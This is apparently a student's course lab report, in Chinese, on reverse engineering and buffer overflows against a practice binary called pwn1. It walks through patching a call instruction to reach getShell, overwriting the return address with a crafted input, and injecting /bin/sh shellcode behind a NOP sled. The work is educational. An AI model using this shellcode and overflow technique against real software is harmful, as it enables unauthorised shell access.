20155308《网络攻防》 Exp1 PC平台逆向破解(5)M

20155308《网络攻防》 Exp1 PC平台逆向破解(5)M

逆向及Bof基础实践说明

1.1 实践目标

1. 本次实践的对象是一个名为pwn1的linux可执行文件。
2. 该程序正常执行流程是：main调用foo函数,foo函数会简单回显任何用户输入的字符串。
3. 该程序同时包含另外一个代码片断，getShell，会返回一个可用Shell。正常状况下这个代码是不会被运行的。咱们实践的目标就是想办法运行这个代码片断。咱们将学习两种方法运行这个代码片断，而后学习如何注入运行任何Shellcode。

• 三个实践内容

1. 手工修改可执行文件，改变程序执行流程，直接跳转到getShell函数。
2. 利用foo函数的Bof漏洞，构造一个攻击输入字符串，覆盖返回地址，触发getShell函数。
3. 注入一个本身制做的shellcode并运行这段shellcode。

• 思路

1. 运行本来不可访问的代码片断
2. 强行修改程序执行流
3. 以及注入运行任意代码。

1.2 基础知识

• Linux基本操做
  参考网页

https://www.cnblogs.com/crazylqy/p/5818745.html

http://blog.csdn.net/zl_best/article/details/53504712

• Bof的原理

缓冲区溢出是一种很是广泛、很是危险的漏洞，在各类操做系统、应用软件中普遍存在。利用缓冲区溢出攻击，能够致使程序运行失败、系统宕机、从新启动等后果。更为严重的是，能够利用它执行非受权指令，甚至能够取得系统特权，进而进行各类非法操做。

攻击原理：

经过往程序的缓冲区写超出其长度的内容，形成缓冲区的溢出，从而破坏程序的堆栈，形成程序崩溃或使程序转而执行其它指令，以达到攻击的目的。形成缓冲区溢出的缘由是程序中没有仔细检查用户输入的参数。例以下面程序：

void function(char *str) {
char buffer[16];
strcpy(buffer,str);
}

上面的strcpy()将直接把str中的内容copy到buffer中。这样只要str的长度大于16，就会形成buffer的溢出，使程序运行出错。存在象strcpy这样的问题的标准函数还有strcat()，sprintf()，vsprintf()，gets()，scanf()等。

固然，随便往缓冲区中填东西形成它溢出通常只会出现“分段错误”（Segmentation fault），而不能达到攻击的目的。最多见的手段是经过制造缓冲区溢出使程序运行一个用户shell，再经过shell执行其它命令。若是该程序有root或者suid执行权限的话，攻击者就得到了一个有root权限的shell，能够对系统进行任意操做了。

• 会使用gdb,vi

参考网页

http://blog.csdn.net/luoying198791/article/details/20715499

实践一：直接修改程序机器指令，改变程序执行流程

• 知识要求：Call指令，EIP寄存器,指令跳转的偏移计算，补码，反汇编指令objdump，十六进制编辑工具
• 学习目标：理解可执行文件与机器指令
• 进阶：掌握ELF文件格式，掌握动态技术

实验过程：

1. 首先进行文件的拷贝，防止出现操做错误，使得源文件被改变。

1. 经过objdump -d pwn1_20155308命令对文件进行反汇编。

1. 关注这几个部分

1. 经过命令vi pwn1_20155308编辑文件，经过命令:%! xxd把文件转为十六进制编辑模式

1. 经过命令/d7ff查找要修改的内容

main函数调用foo，对应机器指令为“ e8 d7ffffff”，
那咱们想让它调用getShell，只要修改“d7ffffff”为，"getShell-80484ba"对应的补码就行。
用Windows计算器，直接 47d-4ba就能获得补码，是c3ffffff。

1. 输入i进入编辑模式，即把d7为c3
2. 输入命令:%! xxd -r将文件转回至二进制形式
3. 输入:wq保存并退出
4. 经过objdump -d pwn1_20155308命令对文件进行反汇编，观察到程序已从原来跳转至foo函数变为跳转至getshell函数

实验结果：

实践二；经过构造输入参数，形成BOF攻击，改变程序执行流

• 知识要求：堆栈结构，返回地址 学习目标：理解攻击缓冲区的结果，掌握返回地址的获取 进阶：掌握ELF文件格式，掌握动态技术

反汇编，了解程序的基本功能

objdump -d pwn1 | more

注意这个函数getShell，咱们的目标是触发这个函数

该可执行文件正常运行是调用以下函数foo，这个函数有Buffer overflow漏洞

这里读入字符串，但系统只预留了__字节的缓冲区，超出部分会形成溢出，咱们的目标是覆盖返回地址

上面的call调用foo,同时在堆栈上压上返回地址值:++80484ba++

如今咱们须要确认输入的字符串哪几个字符会覆盖到返回地址

输入命令gdb pwn2_20155308进行调试

经过命令r进行运行，经过命令info r可查看各寄存器的值

若是输入字符串1111111122222222333333334444444412345678，那 1234 那四个数最终会覆盖到堆栈上的返回地址，进而CPU会尝试运行这个位置的代码。那只要把这四个字符替换为 getShell 的内存地址，输给pwn1，pwn1就会运行getShell。

确认用什么值来覆盖返回地址

getShell的内存地址，经过反汇编时能够看到，即0804847d。

接下来要确认下字节序，简单说是输入11111111222222223333333344444444\x08\x04\x84\x7d,仍是输入11111111222222223333333344444444\x7d\x84\x04\x08。

对比以前 ==eip 0x34333231 0x34333231== ，正确应用输入 ==11111111222222223333333344444444\x7d\x84\x04\x08==。

构造输入字符串

由为咱们无法经过键盘输入\x7d\x84\x04\x08这样的16进制值，因此先生成包括这样字符串的一个文件。\x0a表示回车，若是没有的话，在程序运行时就须要手工按一下回车键。

实践三：注入Shellcode并执行

• shellcode就是一段机器指令（code）
  一般这段机器指令的目的是为获取一个交互式的shell（像linux的shell或相似windows下的cmd.exe），
  因此这段机器指令被称为shellcode。
  在实际的应用中，凡是用来注入的机器指令段都通称为shellcode，像添加一个用户、运行一条指令。
  --

最基本的shellcode的编写可参考许同窗的文章Shellcode入门，写得很是之清楚详实。如下实践即便用该文章中生成的shellcode。以下：

\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\

准备工做

◦输入命令execstack -s pwn1
设置堆栈可执行。可是系统提示“未找到命令”，则应输入命令apt-get install execstack进行安装。系统会提示产生一下错误，我上网寻找了答案，应该输入如下命令给它管理员权限。

以后根据命令输入。

构造要注入的payload

• Linux下有两种基本构造攻击buf的方法：

1. retaddr+nop+shellcode
2. nop+shellcode+retaddr。

-由于retaddr在缓冲区的位置是固定的，shellcode要不在它前面，要不在它后面。

简单说缓冲区小就把shellcode放后边，缓冲区大就把shellcode放前边

-咱们这个buf够放这个shellcode了。
结构为：nops+shellcode+retaddr。
nop一为是了填充，二是做为“着陆区/滑行区”。
咱们猜的返回地址只要落在任何一个nop上，天然会滑到咱们的shellcode。

root@KaliYL:~# perl -e 'print "\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x4\x3\x2\x1\x00"' > input_shellcode

接下来咱们来肯定\x4\x3\x2\x1到底该填什么。

个人这个部分在文档里忽然出错，而后怎么解决都没有解决，因此我到桌面上继续进行这个方面的实践。

打开一个终端注入这段攻击buf：

(cat input_shellcode;cat) | ./pwn1_20155308

再开另一个终端，用gdb来调试pwn1这个进程。

注意运行时的这个地址

计算出地址应为0xffffd300

再次攻击，成功了！！

感想

本次实验是关于PC平台逆向破解的实验，在课堂上老师已经对本次实验进行了讲解，而且咱们在课堂上已经实现了一部分，因此感受课下的工做并非很难。 经过本次实验，我对于本课的知识有了必定的了解，而且以为若是想要学好这门课，必定要作好课上认真听讲，课下进行实践。